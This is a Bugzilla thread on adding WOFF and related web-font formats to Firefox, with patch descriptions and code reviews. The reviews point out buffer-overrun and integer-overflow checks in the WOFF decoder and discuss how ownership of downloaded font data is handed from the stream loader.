expanded from macro '_cvtss_sh'
(unsigned short)((__v8hi)__builtin_ia32_vcvtps2ph((__v4sf){a, 0, 0, 0}, \
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
intr.cpp:10:5: error: assigning to 'unsigned short' from incompatible type
'void'
a = _cvtss_sh(res, imm);
^ ~~~~~~~~~~~~~~~~~~~
2 errors generated.
I further simplified the macros by removing the statement for the define that I added (_cvtss_sh) and for the one that was there before (_mm_cvtps_ph).
I also formatted __DEFAULT_FN_ATTRS macro to comply with 80 characters limitation.
Craig, do you think it's necessary to make the tests more fancy by checking how the vector is initialized before the builtin invocation and/or that one element is extracted from the vector after the builtin returned a value? It will add additional 10-15 check lines to each test. My concern is that these additional lines might change from time to time.
I agree that the vector initialization code will be prone to changing. I think what you have is fine.
LGTM | https://reviews.llvm.org/D16177 | CC-MAIN-2021-31 | refinedweb | 870 | 67.76 |
freud.density.GaussianDensity¶
The
freud.density module is intended to compute a variety of quantities that relate spatial distributions of particles with other particles. In this notebook, we demonstrate
freud’s Gaussian density calculation, which provides a way to interpolate particle configurations onto a regular grid in a meaningful way that can then be processed by other algorithms that require regularity, such as a Fast Fourier Transform.
[1]:
import numpy as np from scipy import stats import freud import matplotlib.pyplot as plt
To illustrate the basic concept, consider a toy example: a simple set of point particles with unit mass on a line. For analytical purposes, the standard way to accomplish this would be using Dirac delta functions.
[2]:
n_p = 10000 np.random.seed(129) x = np.linspace(0, 1, n_p) y = np.zeros(n_p) points = np.random.rand(10) y[(points*n_p).astype('int')] = 1 plt.plot(x, y); plt.show()
However, delta functions can be cumbersome to work with, so we might instead want to smooth out these particles. One option is to instead represent particles as Gaussians centered at the location of the points. In that case, the total particle density at any point in the interval \([0, 1]\) represented above would be based on the sum of the densities of those Gaussians at those points.
[3]:
# Note that we use a Gaussian with a small standard deviation # to emphasize the differences on this small scale dists = [stats.norm(loc=i, scale=0.1) for i in points] y_gaussian = 0 for dist in dists: y_gaussian += dist.pdf(x) plt.plot(x, y_gaussian); plt.show()
The goal of the GaussianDensity class is to perform the same interpolation for points on a 2D or 3D grid, accounting for Box periodicity.
[4]:
N = 1000 # Number of points L = 10 # Box length box, points = freud.data.make_random_system(L, N, is2D=True, seed=0)_2<<
The effects are much more striking if we explicitly construct our points to be centered at certain regions.
[5]:
N = 1000 # Number of points L = 10 # Box length box = freud.box.Box.square(L) centers = np.array([[L/4, L/4, 0], [-L/4, L/4, 0], [L/4, -L/4, 0], [-L/4, -L/4, 0]]) points = [] for center in centers: points.append(np.random.multivariate_normal(center, cov=np.diag([1, 1, 0]), size=(int(N/4),))) points = box.wrap(np.concatenate(points))_3<< | https://freud.readthedocs.io/en/fix-rtd-libgfortran-version/gettingstarted/examples/module_intros/density.GaussianDensity.html | CC-MAIN-2021-21 | refinedweb | 399 | 58.08 |
Cython¶
Like Numba, Cython provides an approach to generating fast compiled code that can be used from Python.
As was the case with Numba, a key problem is the fact that Python is dynamically typed.
As you’ll recall, Numba solves this problem (where possible) by inferring type.
Cython’s approach is different — programmers add type definitions directly to their “Python” code.
As such, the Cython language can be thought of as Python with type definitions.
In addition to a language specification, Cython is also a language translator, transforming Cython code into optimized C and C++ code.
Cython also takes care of building language extensions — the wrapper code that interfaces between the resulting compiled code and Python.
Important Note:
In what follows code is executed in a Jupyter notebook.
This is to take advantage of a Cython cell magic that makes Cython particularly easy to use.
Some modifications are required to run the code outside a notebook.
- See the book Cython by Kurt Smith or the online documentation.
A First Example¶
Let’s start with a rather artificial example.
Suppose that we want to compute the sum $ \sum_{i=0}^n \alpha^i $ for given $ \alpha, n $.
Suppose further that we’ve forgotten the basic formula$$ \sum_{i=0}^n \alpha^i = \frac{1 - \alpha^{n+1}}{1 - \alpha} $$
for a geometric progression and hence have resolved to rely on a loop.
def geo_prog(alpha, n): current = 1.0 sum = current for i in range(n): current = current * alpha sum = sum + current return sum
This works fine but for large $ n $ it is slow.
Here’s a C function that will do the same thing
double geo_prog(double alpha, int n) { double current = 1.0; double sum = current; int i; for (i = 1; i <= n; i++) { current = current * alpha; sum = sum + current; } return sum; }
If you’re not familiar with C, the main thing you should take notice of is the type definitions
intmeans integer
doublemeans double precision floating-point number
- the
doublein
double geo_prog(...indicates that the function will return a double
Not surprisingly, the C code is faster than the Python code.
%load_ext Cython
In the next cell, we execute the following
%%cython def geo_prog_cython(double alpha, int n): cdef double current = 1.0 cdef double sum = current cdef int i for i in range(n): current = current * alpha sum = sum + current return sum
Here
cdef is a Cython keyword indicating a variable declaration and is followed by a type.
The
%%cython line at the top is not actually Cython code — it’s a Jupyter cell magic indicating the start of Cython code.
After executing the cell, you can now call the function
geo_prog_cython from within Python.
What you are in fact calling is compiled C code with a Python call interface
import quantecon as qe qe.util.tic() geo_prog(0.99, int(10**6)) qe.util.toc()
TOC: Elapsed: 0:00:0.12
0.12008047103881836
qe.util.tic() geo_prog_cython(0.99, int(10**6)) qe.util.toc()
TOC: Elapsed: 0:00:0.05
0.051430463790893555
Example 2: Cython with NumPy Arrays¶
Let’s go back to the first problem that we worked with: generating the iterates of the quadratic map$$ x_{t+1} = 4 x_t (1 - x_t) $$
The problem of computing iterates and returning a time series requires us to work with arrays.
The natural array type to work with is NumPy arrays.
Here’s a Cython implementation that initializes, populates and returns a NumPy array
%%cython import numpy as np def qm_cython_first_pass(double x0, int n): cdef int t x = np.zeros(n+1, float) x[0] = x0 for t in range(n): x[t+1] = 4.0 * x[t] * (1 - x[t]) return np.asarray(x)
If you run this code and time it, you will see that its performance is disappointing — nothing like the speed gain we got from Numba
qe.util.tic() qm_cython_first_pass(0.1, int(10**5)) qe.util.toc()
TOC: Elapsed: 0:00:0.04
0.04188847541809082
This example was also computed in the Numba lecture, and you can see Numba is around 90 times faster.
The reason is that working with NumPy arrays incurs substantial Python overheads.
We can do better by using Cython’s typed memoryviews, which provide more direct access to arrays in memory.
When using them, the first step is to create a NumPy array.
Next, we declare a memoryview and bind it to the NumPy array.
Here’s an example:
%%cython import numpy as np from numpy cimport float_t def qm_cython(double x0, int n): cdef int t x_np_array = np.zeros(n+1, dtype=float) cdef float_t [:] x = x_np_array x[0] = x0 for t in range(n): x[t+1] = 4.0 * x[t] * (1 - x[t]) return np.asarray(x)
Here
cimportpulls in some compile-time information from NumPy
cdef float_t [:] x = x_np_arraycreates a memoryview on the NumPy array
x_np_array
- the return statement uses
np.asarray(x)to convert the memoryview back to a NumPy array
Let’s time it:
qe.util.tic() qm_cython(0.1, int(10**5)) qe.util.toc()
TOC: Elapsed: 0:00:0.00
0.0008900165557861328
This is fast, although still slightly slower than
qm_numba.
Summary¶
Cython requires more expertise than Numba, and is a little more fiddly in terms of getting good performance.
In fact, it’s surprising how difficult it is to beat the speed improvements provided by Numba.
Nonetheless,
- Cython is a very mature, stable and widely used tool.
- Cython can be more useful than Numba when working with larger, more sophisticated applications.
!pip install joblib
Requirement already satisfied: joblib in /home/qebuild/anaconda3/lib/python3.7/site-packages (0.13.2)
from within a notebook.
Here we review just the basics.
Caching¶
Perhaps, like us, you sometimes run a long computation that simulates a model at a given set of parameters — to generate a figure, say, or a table.
20 minutes later you realize that you want to tweak the figure and now you have to do it all again.
What caching will do is automatically store results at each parameterization.
With Joblib, results are compressed and stored on file, and automatically served back up to you when you repeat the calculation.
An Example¶
Let’s look at a toy example, related to the quadratic map model discussed above.
Let’s say we want to generate a long trajectory from a certain initial condition $ x_0 $ and see what fraction of the sample is below 0.1.
(We’ll omit JIT compilation or other speedups for simplicity)
Here’s our code
from joblib import Memory location = './cachedir' memory = Memory(location='./joblib_cache') @memory.cache def qm(x0, n): x = np.empty(n+1) x[0] = x0 for t in range(n): x[t+1] = 4 * x[t] * (1 - x[t]) return np.mean(x < 0.1)
We are using joblib to cache the result of calling qm at a given set of parameters.
With the argument location=’./joblib_cache’, any call to this function results in both the input values and output values being stored a subdirectory joblib_cache of the present working directory.
(In UNIX shells, . refers to the present working directory)
The first time we call the function with a given set of parameters we see some extra output that notes information being cached
qe.util.tic() n = int(1e7) qm(0.2, n) qe.util.toc()
________________________________________________________________________________ [Memory] Calling __main__--home-qebuild-repos-quantecon.build.lectures-_source-lecture-source-py-_build-website-jupyter-executed-__ipython-input__.qm... qm(0.2, 10000000) ______________________________________________________________qm - 10.4s, 0.2min TOC: Elapsed: 0:00:10.40
10.408669471740723
The next time we call the function with the same set of parameters, the result is returned almost instantaneously
qe.util.tic() n = int(1e7) qm(0.2, n) qe.util.toc()
TOC: Elapsed: 0:00:0.00
0.0008406639099121094
Other Options¶
There are in fact many other approaches to speeding up your Python code.
One is interfacing with Fortran.
If you are comfortable writing Fortran you will find it very easy to create extension modules from Fortran code using F2Py.
F2Py is a Fortran-to-Python interface generator that is particularly simple to use.
Robert Johansson provides a very nice introduction to F2Py, among other things.
Recently, a Jupyter cell magic for Fortran has been developed — you might want to give it a try.
Exercise 1¶
Later we’ll learn all about finite-state Markov chains.
For now, let’s just concentrate on simulating a very simple example of such a chain.
Suppose that the volatility of returns on an asset can be in one of two regimes — high or low.
The transition probabilities across states are as follows
For example, let the period length be one month, and suppose the current state is high.
We see from the graph that the state next month will be
- high with probability 0.8
- low with probability 0.2
Your task is to simulate a sequence of monthly volatility states according to this rule.
Set the length of the sequence to
n = 100000 and start in the high state.
Implement a pure Python version, a Numba version and a Cython version, and compare speeds.
To test your code, evaluate the fraction of time that the chain spends in the low state.
If your code is correct, it should be about 2/3.
p, q = 0.1, 0.2 # Prob of leaving low and high state respectively
Here’s a pure Python version of the function
def compute_series(n): x = np.empty(n, dtype=np.int_) x[0] = 1 # Start in state 1 U = np.random.uniform(0, 1, size=n) for t in range(1, n): current_x = x[t-1] if current_x == 0: x[t] = U[t] < p else: x[t] = U[t] > q return x
Let’s run this code and check that the fraction of time spent in the low state is about 0.666
n = 100000 x = compute_series(n) print(np.mean(x == 0)) # Fraction of time x is in state 0
0.67497
Now let’s time it
qe.util.tic() compute_series(n) qe.util.toc()
TOC: Elapsed: 0:00:0.09
0.09005856513977051
Next let’s implement a Numba version, which is easy
from numba import jit compute_series_numba = jit(compute_series)
Let’s check we still get the right numbers
x = compute_series_numba(n) print(np.mean(x == 0))
0.66727
Let’s see the time
qe.util.tic() compute_series_numba(n) qe.util.toc()
TOC: Elapsed: 0:00:0.00
0.001298666000366211
This is a nice speed improvement for one line of code.
Now let’s implement a Cython version
%load_ext Cython
The Cython extension is already loaded. To reload it, use: %reload_ext Cython
%%cython import numpy as np from numpy cimport int_t, float_t def compute_series_cy(int n): # == Create NumPy arrays first == # x_np = np.empty(n, dtype=int) U_np = np.random.uniform(0, 1, size=n) # == Now create memoryviews of the arrays == # cdef int_t [:] x = x_np cdef float_t [:] U = U_np # == Other variable declarations == # cdef float p = 0.1 cdef float q = 0.2 cdef int t # == Main loop == # x[0] = 1 for t in range(1, n): current_x = x[t-1] if current_x == 0: x[t] = U[t] < p else: x[t] = U[t] > q return np.asarray(x)
compute_series_cy(10)
array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
x = compute_series_cy(n) print(np.mean(x == 0))
0.67253
qe.util.tic() compute_series_cy(n) qe.util.toc()
TOC: Elapsed: 0:00:0.00
0.003190279006958008
The Cython implementation is fast but not as fast as Numba. | https://lectures.quantecon.org/py/sci_libs.html | CC-MAIN-2019-35 | refinedweb | 1,927 | 66.44 |
How can i return some value to server from client machine
Discussion in 'ASP .Net' started by Joby,52
- Joby
- May 14, 2004
Server to server = Server client to server?-, Jul 29, 2005, in forum: Java
- Replies:
- 2
- Views:
- 431
- Alan Krueger
- Jul 29, 2005
what value does lack of return or empty "return;" returnGreenhorn, Mar 3, 2005, in forum: C Programming
- Replies:
- 15
- Views:
- 866
- Keith Thompson
- Mar 6, 2005
Web Service Client Cannot Connect to Web Service From Some Machine, Oct 11, 2005, in forum: ASP .Net Web Services
- Replies:
- 0
- Views:
- 223
Syntax bug, in 1.8.5? return not (some expr) <-- syntax error vsreturn (not (some expr)) <-- fineGood Night Moon, Jul 22, 2007, in forum: Ruby
- Replies:
- 9
- Views:
- 305
- Rick DeNatale
- Jul 25, 2007 | http://www.thecodingforums.com/threads/how-can-i-return-some-value-to-server-from-client-machine.78046/ | CC-MAIN-2014-49 | refinedweb | 129 | 62.82 |
Viewer component which moves the camera in a plane.
More...
#include <Inventor/Wx/viewers/SoWxPlaneViewer.h>
The Plane viewer component allows the user to translate the camera in the viewing plane, as well as dolly (move foward/backward) and zoom in and out. The viewer also allows the user to roll the camera (rotate around the forward direction) and seek to objects which will specify a new viewing plane. This viewer could be used for modeling, in drafting, and architectural work. The camera can be aligned to the X, Y or Z axes.
Left Mouse or
Left + Middle Mouse: Dolly in and out (gets closer to and further away from the object).
Middle Mouse or
Ctrl + Left Mouse: Translate up, down, left and right.
Ctrl + Middle Mouse: Used for roll action (rotates around the viewer forward direction).
<s> + Left Mouse: Alternative to the Seek button. Press (but do not hold down) the <s> key, then click on a target object.
Right Mouse: Open the popup menu.
ALT : (Win32) When the viewer is in selection (a.k.a. pick) mode, pressing and holding the ALT key temporarily switches the viewer to viewing mode. When the ALT key is released, the viewer returns to selection mode. Note: If any of the mouse buttons are currently depressed, the ALT key has no effect.ExaminerViewer,
Constructor which specifies the viewer type.
Please refer to SoWxViewer for a description of the viewer types.
Destructor.
Sets the edited camera.
Setting the camera is only needed if the first camera found in the scene when setting the scene graph isn't the one the user really wants to edit.
Reimplemented from SoWxFullViewer..
Moves the camera to be aligned with the given plane.. | https://developer.openinventor.com/refmans/9.9/RefManCpp/class_so_wx_plane_viewer.html | CC-MAIN-2020-16 | refinedweb | 285 | 75.1 |
Setting up a bug for use with experimental versions supporting new web font formats. Currently there are several formats being discussed on the www-font mailing list, primarily .webfont, EOT-Lite and ZOT. All are basically wrapper formats around OpenType/TrueType font data.
Created attachment 392223 [details] [diff] [review]
patch to support downloadable fonts in .zot format

This is the patch I used to build an experimental version with .zot support. It's not complete - for one thing, I didn't implement a separate font-format hint for .zot - but seemed to work OK.
Created attachment 392381 [details] [diff] [review]
patch, support EOT-Lite fonts

Initial patch to load EOT-Lite formatted fonts. I omitted the version check, since this is still under discussion and various tools use a myriad of versions. Support for a version hint is not included.

Testcase example:

Next step is to take Jonathan's patch and add in zot support.
Created attachment 392422 [details] [diff] [review]
patch, integrate support for both EOT-Lite and ZOT

Adds in support for zot fonts and fixes bug in original EOT-Lite patch. Memory handling of zot fonts is hacky here: maintain a list of decode buffer pointers and clear them out when gfxUserFontSet is taken down (ick).

Test page with ZOT fonts:
Try server build here:

Test pages for direct linking, EOT-Lite and ZOT formats:

Enjoy!
Created attachment 393284 [details] [diff] [review]
patch, integrate support for EOT-Lite and WebOTF (replacing ZOT)

>      GFX_USERFONT_ZOT = 4,
> -    GFX_USERFONT_WEBFONT = 5
> +    GFX_USERFONT_WEBOTF = 5

Why did you replace .webfont rather than ZOT?
Err.... no particular reason; WebOTF is a hybrid of the two, actually. AFAIK the webfont constant was just a placeholder, it hadn't been implemented anyway.
Then GFX_USERFONT_ZOT is no longer required, I think.
Created attachment 393346 [details] [diff] [review]
updated EOTL + WebOTF patch

Oops, previous version of the patch used an obsolete header format for WebOTF. :( Also eliminated the GFX_USERFONT_ZOT constant.
Created attachment 397353 [details] [diff] [review]
updated patch for current trunk, supporting WOFF only (not EOTL)

This version of the patch uses code based on the latest rev of the WOFF (formerly WebOTF) spec. There is a test page using Gentium in WOFF format, as well as the spec itself and code for font-conversion tools, all available from.
Created attachment 397357 [details] [diff] [review]
fixing bug in previous patch

Sorry for the bugspam - previous patch wasn't properly refreshed. :(
Created attachment 397546 [details] [diff] [review]
updated WOFF patch with new buffer management for downloaded font data

This version of the patch reworks the management of the downloaded data, based on some discussion with Roc. The basic idea here is that once the font data is downloaded, ownership of the data is passed from the nsStreamLoader to the gfxUserFontSet, for use when creating a new gfxFontEntry. And if the font entry requires the data to persist (which is the case for Freetype fonts, I believe), it takes over responsibility for the buffer.

To do this, the downloaded data is stored as an nsTArray<PRUint8>, so that we can use SwapElements to transfer ownership of the actual data buffer between objects as needed.
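The SwapElements handoff described here can be illustrated with plain std::vector standing in for nsTArray (the struct names below are made up for the sketch, not Gecko's real classes):

```cpp
#include <cstdint>
#include <vector>

// Hypothetical sketch of the ownership handoff: std::vector::swap stands in
// for nsTArray::SwapElements. After AdoptData(), the loader's array is empty
// and the loader can be destroyed without touching the font bytes.
struct StreamLoaderSketch {
    std::vector<uint8_t> mData;  // filled during the download
};

struct FontEntrySketch {
    std::vector<uint8_t> mFontData;

    void AdoptData(StreamLoaderSketch& loader) {
        mFontData.swap(loader.mData);  // O(1) pointer swap, no copy
    }
};
```

The point is that swap() exchanges the internal buffer pointers, so a multi-megabyte font never gets copied and the loader can be torn down immediately after the handoff.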
Comment on attachment 397546 [details] [diff] [review]
updated WOFF patch with new buffer management for downloaded font data

I like the fix you and roc came up with, that's much better than existing code. I'm going to ask jduell to review the netwerk portion of the patch, it makes sense to me. But I'm minusing the review here due to buffer overrun issues in the woff.c code (see below).

> +// for use with EOT-Lite header, native data in little-endian form
> +#ifdef IS_LITTLE_ENDIAN
> +#define NS_LE_SWAP16(x) (x)
> +#define NS_LE_SWAP32(x) (x)
> +#else
> +#define NS_LE_SWAP16(x) ((((x) & 0xff) << 8) | (((x) >> 8) & 0xff))
> +#define NS_LE_SWAP32(x) ((NS_LE_SWAP16((x) & 0xffff) << 16) | (NS_LE_SWAP16((x) >> 16)))
> +#endif

Don't need this code along with the AutoSwapLE classes below this, it's only for EOT-Lite usage.

> +    default:
> +        // should we have a warning here?
> +        break;

A NS_WARNING here would be nice.

> +const char * woffEncode(const char * sfntData, uint32_t sfntLen,
> +                        uint16_t majorVersion, uint16_t minorVersion,
> +                        uint32_t * woffLen, uint32_t * status);

I don't see any reason to use char * here rather than uint8_t *.

> +    origLen = READ32BE(woffDir[i].origLen);
> +    compLen = READ32BE(woffDir[i].compLen);
> +    if (offset + origLen > totalLen) {
> +        break;
> +    }
> +    memcpy(sfntData + offset,
> +           woffData + READ32BE(woffDir[i].offset), origLen);

This code allows reads/writes past the end of buffers. If origLen == 0xFFFFFFFF and compLen == origLen, a crash will almost certainly occur in memcpy, since the sum 'offset + origLen' would overflow into offset - 1 and satisfy the overflow check. I think something like this would fix it:

    if (offset + origLen > totalLen && offset + origLen > offset)

> +    offset += origLen;
> +    while ((offset & 3) != 0) {
> +        sfntData[offset++] = 0;
> +    }

This also allows potentially writing off the end of the output buffer.

> +    head = (sfntHeadTable *)(sfntData + headOffset);
> +    head->checkSumAdjustment = 0;
> +    csumPtr = (const uint32_t *)sfntData;
> +    while (csumPtr < (const uint32_t *)(sfntData + totalLen)) {
> +        csum += READ32BE(*csumPtr);
> +        csumPtr++;
> +    }
> +    csum = 0xb1b0afbaU - csum;
> +    head->checkSumAdjustment = READ32BE(csum);

This seems like a bit of a spec issue to me, implementations shouldn't be required to recompute checksums, this seems like it's better handled by tools. When recalculation is needed, it would be better I think to calculate this from the checksums in the table headers rather than making yet another pass over the data file. Current implementations ignore the checksum.

It would be nice to disable all the encoding code in woff.c. Maybe a simple conditional DISABLE_ENCODING or something like that, with the default being to compile everything and the conditional defined in the makefile.

The sfnt structures in woff-private.h and woff.c all appear to be short aligned but I think for safety you should have a #pragma pack(1) there so that the code doesn't implicitly assume a given alignment within TrueType structures.

I haven't yet taken a close look at the encoding routines, I think those may need to change based on discussions related to checksums.
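For reference, the wraparound hazard flagged in the review (offset + origLen overflowing 32 bits so the naive bounds test passes) can be ruled out by writing the check in a form where no addition can overflow — a minimal sketch:

```cpp
#include <cstdint>

// Overflow-safe bounds check: instead of testing offset + len > total
// (where the sum can wrap around), compare len against the space that
// remains after offset. Neither operation here can overflow.
bool FitsInBuffer(uint32_t offset, uint32_t len, uint32_t total) {
    return offset <= total && len <= total - offset;
}
```

With len near UINT32_MAX, the naive sum wraps to a small value and the copy proceeds; the subtraction form rejects it correctly.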
Created attachment 397903 [details] [diff] [review]
updated patch addressing review comments

This should fix the potential buffer overflows in decoding, and it handles the checksum recalculation more efficiently.
Created attachment 397946 [details] [diff] [review]
further sanity-checking in the WOFF code; omit encoding functions

Sorry for the bugspam, but I have added some more error-checking to the woff.c functions, and the Makefile option to skip compiling the encoding functions (forgot to finish that last time).

Regarding the font checksum, I'd prefer not to require specific behavior in the encoder (with regard to table ordering, etc), but instead have added a note to the spec pointing out that a decoder needs to recalculate the checksum and update it in the 'head' table. I've modified the decoding function in woff.c to do this without scanning the entire font; only the new sfnt table directory needs to be summed, along with the per-table checksums (which are stable). This makes it a very cheap operation, and it's much simpler this way than trying to write and explain a spec that involves calculating a "predicted" checksum for the decoded font during the encoding process.
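A sketch of that cheap recalculation, assuming the usual sfnt rule that the whole-font checksum (with checkSumAdjustment zeroed) must equal 0xB1B0AFBA; the function name here is illustrative, not from woff.c:

```cpp
#include <cstdint>
#include <vector>

// Sketch: derive the 'head' table's checkSumAdjustment from the checksum of
// the rebuilt sfnt header + table directory plus the (unchanged) per-table
// checksums, rather than re-summing every byte of the decoded font.
// All arithmetic is modulo 2^32, as the sfnt checksum convention requires.
uint32_t CheckSumAdjustment(uint32_t directoryCheckSum,
                            const std::vector<uint32_t>& tableCheckSums) {
    uint32_t fontSum = directoryCheckSum;
    for (uint32_t c : tableCheckSums) {
        fontSum += c;  // wraps on overflow, which is intended
    }
    return 0xB1B0AFBAu - fontSum;
}
```

Only the rebuilt header and directory need to be summed; the per-table checksums come straight from the table directory entries, which decoding leaves unchanged.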
Created attachment 399738 [details] [diff] [review]
add extractData() method to nsIStreamLoader, to support new web-font implementation

This patch adds an extractData() method on nsIStreamLoader to fetch the data into a caller-provided array. The issue here is that for downloaded fonts (@font-face), it makes most sense for the gfx classes to manage the lifetime of the data once it has been downloaded; depending on the font format and the platform, it may be quickly discarded or it may need to be held until we are finished with the font.

The new extractData() method allows the caller to obtain the downloaded data in an nsTArray, and deletes it from the loader; by using SwapElements(), we can do this without having to copy the (potentially large) buffer of font data. The loader can then be safely destroyed, and the gfx classes have sole responsibility for the font data.
Created attachment 399740 [details] [diff] [review]
updated WOFF patch corresponding to the 2009-09-10 specification

This depends on the preceding patch to nsIStreamLoader.

Tryserver builds available at
The proposed nsIStreamLoader API worries me, because it's so easy to misuse. Once you extract, you suddenly have this data pointer you were given that points to .... where? The data you extracted? Something else? I'm not quite sure what a better approach is, though. Would it make sense to just manually realloc in the streamloader instead of using a TArray and then have a success code the consumer can return for "I took ownership of this data"? That doesn't help the consumer get it into TArray form, though....
(In reply to comment #18) > I'm not quite sure what a better approach is, though. Would it make sense to > just manually realloc in the streamloader instead of using a TArray and then > have a success code the consumer can return for "I took ownership of this > data"? That's good enough for us. Should we do that?
I think I would prefer that, yeah.
Created attachment 400443 [details] [diff] [review] revised nsIStreamLoader patch Revised the network patch to allow the observer to take over the data pointer by returning a custom success code. (Corresponding WOFF patch will follow.)
Created attachment 400479 [details] [diff] [review] updated WOFF patch to work with revised streamloader This seems to work ok here on Mac, Windows, and Linux. Not thoroughly tested (including invalid fonts, etc) yet.
Comment on attachment 400443 [details] [diff] [review]
revised nsIStreamLoader patch

>+++ b/netwerk/base/public/nsIStreamLoader.idl
>+ * If the observer wants to take over responsibility for the
>+ * data buffer (result), it returns NS_SUCCESS_ADOPTED_DATA
>+ * in place of NS_OK as its success code. The loader will then
>+ * "forget" about the data, and not free() it in its own
>+ * destructor; observer must call free() when the data is
>+ * no longer required.

Those should be NS_Free, not free(). And the various allocation/deallocation in this patch should use NS_Malloc, NS_Free, NS_Realloc.

>+++ b/netwerk/base/src/nsStreamLoader.cpp
>@@ -119,17 +145,34 @@ nsStreamLoader::WriteSegmentFun(nsIInput
>+ if (count > 0xffffffffU - self->mLength) {
>+ return NS_ERROR_ILLEGAL_VALUE; // is there a better error to use here?

Did you want PR_UINT32_MAX instead of the hex constant? Could just use NS_ERROR_OUT_OF_MEMORY here too, I guess, but ILLEGAL_VALUE is maybe better.

>+++ b/netwerk/base/src/nsStreamLoader.h
>+ PRUint32 mAllocated;
>+ PRUint32 mLength;

Please document the difference.

r=bzbarsky with those nits picked.
Created attachment 400504 [details] [diff] [review] corrected patch to fix broken build on windows mobile
Created attachment 400543 [details] [diff] [review] updated nsIStreamLoader patch to address review comments
Created attachment 400547 [details] [diff] [review] updated WOFF patch to sync with reviewed streamloader patch
John, FYI: I've found a potential segfault in the woff decoder (a bogus offset in the table directory can cause it to read from an invalid address). Fixed this locally, but I'll wait for additional comments from you before posting yet another version of the patch, as I'm sure you'll find some things too.
Created attachment 400603 [details] [diff] [review]
reftests for font loading using TTF and WOFF formats, good and bad files

These are some reftests for @font-face loading, based on a small font from openfontlibrary.org. We test that both .ttf and .woff formats load, then test versions with bad checksums (which should still load) and some invalid files that should NOT load. (There are of course many more kinds of invalid-font errors that could be tested; this is just a beginning.)

> + // mFontData holds the data used to instantiate the FT_Face;
> + // this has to persist until we are finished with the face,
> + // then be released with NS_Free().
> + const PRUint8* mFontData;

As above, use nsAutoPtr<const PRUint8> instead?

> PRBool
> gfxUserFontSet::OnLoadComplete(gfxFontEntry *aFontToLoad,
>                                nsISupports *aLoader,
>                                const PRUint8 *aFontData, PRUint32 aLength,
>                                nsresult aDownloadStatus)

The stream loader has been trimmed out below this layer and should be trimmed out here also.

> +/* These macros to read values as big-endian only work on "real" variables,
> +   not general expressions, because of the use of &(x), but they are
> +   designed to work on both BE and LE machines without the need for a
> +   configure check. For production code, we might want to replace this
> +   with something more efficient. */
> +/* read a 32-bit BigEndian value */
> +#define READ32BE(x) ( ( (uint32_t) ((uint8_t*)&(x))[0] << 24 ) + \
> +                      ( (uint32_t) ((uint8_t*)&(x))[1] << 16 ) + \
> +                      ( (uint32_t) ((uint8_t*)&(x))[2] << 8 ) + \
> +                        (uint32_t) ((uint8_t*)&(x))[3] )
> +/* read a 16-bit BigEndian value */
> +#define READ16BE(x) ( ( (uint16_t) ((uint8_t*)&(x))[0] << 8 ) + \
> +                        (uint16_t) ((uint8_t*)&(x))[1] )

I think it would be better to conditionalize these on MOZILLA_CLIENT and use the PR_SWAP macros instead when building for Mozilla.
> +typedef struct { > + uint32_t tag; > + uint32_t offset; > + uint16_t oldIndex; > + uint16_t newIndex; > +} tagAndOffset; I think this can be reduced to just the offset and oldIndex fields, the tag can always be referenced from the "old" data and newIndex is simply the index in the array. The woffDecode routine calls woffGetDecodedSize which calls sanityCheck. After that woffDecode calls woffDecodeToBuffer which again calls sanityCheck. Better to have static internal functions for woffGetDecodedSize and woffDecodeToBuffer which assume sanityCheck has already been called, then call sanityCheck in woffDecode so that sanityCheck is only called once within woffDecode. Right now sanityCheck only looks at header values, might be handy if it explicitly checked all the woff directory entries to test (1) the sum of the origLen values does not overflow and is equal to totalSfntSize, (2) validate the offset/lengths point to valid ranges within the original data and (3) compLen <= origLen is true for all values (the spec says compLen > origLen is invalid but the code treats this as compLen == origLeng (i.e. uncompressed)). Within woffDecodeToBuffer: > + if (compLen < origLen) { > + uint32_t sourceOffset = READ32BE(woffDir[tableIndex].offset); > + uLongf destLen = origLen; > + if (uncompress((Bytef *)(sfntData + offset), &destLen, > + (const Bytef *)(woffData + sourceOffset), > + compLen) != Z_OK || destLen != origLen) { > + FAIL(eWOFF_compression_failure); > + } > + } else { > + uint32_t sourceOffset = READ32BE(woffDir[tableIndex].offset); > + memcpy(sfntData + offset, woffData + sourceOffset, origLen); > + } As noted above, compLen > origLen should be an error. Also, you're not validating the woff offset so a read past the end of the buffer seems possible. > + while (offset < totalLen && (offset & 3) != 0) { > + sfntData[offset++] = 0; > + } This will pad all but the last table, I think we should probably be careful about padding even the last table. 
> + while (csumPtr < (const uint32_t *)(sfntData + 12 + > + numTables * sizeof(sfntDirEntry))) { Change the '12' here to sizeof(sfntHeader). > + csum = 0xb1b0afbaU - csum; This should be a named constant similar to HEAD_CHECKSUM_CALC_CONST in gfxFontUtils.cpp. > + sfntData = (uint8_t *) malloc(bufLen); Calls to free, malloc and realloc should be #define'd to PR_FREE, etc. when MOZILLA_CLIENT is defined (plus prmem.h included). I only looked at the decode routines today since those are the ones that affect Mozilla production code. The encode routines don't affect the build (unless the format changes) so they can be changed without review. I'm going to play around with those tomorrow.
In woffGetMetadata: > + uint32_t offset, compLen; > + uLong origLen; > + uint8_t * data = NULL; Change uLong to uint32_t? + if (offset + compLen > woffLen) { + FAIL(eWOFF_invalid); + } This doesn't handle the case where (offset + compLen) overflows. Same comment for woffGetPrivateData. +#ifndef WOFF_DISABLE_ENCODING Maybe this should be #ifndef MOZILLA_CLIENT instead. And we shouldn't be compiling woffGetMetadata, woffGetPrivateData, woffGetFontVersion since they're not used. I also spotted a few unused variables, not sure why the compiler isn't flagging those more clearly: woffEncode - totalLength woffGetDecodedSize - numTables
(In reply to comment #29)
> As above, use nsAutoPtr<const PRUint8> instead?

AIUI, we can't do that: the memory was allocated via NS_Alloc, not operator new. nsAutoPtr would try to use operator delete to free it, which is wrong.
Right. If we can guarantee that no one will ever use this interface across modules (which we can't even for Firefox in a non-libxul build), then we could use nsAutoPtr. As it is, we're stuck with doing it all through the XPCOM allocator...
Created attachment 400807 [details] [diff] [review]
improved woff validation, improved comments re buffer ownership, etc

(In reply to comment #29)
> As above, use nsAutoPtr<const PRUint8> instead?

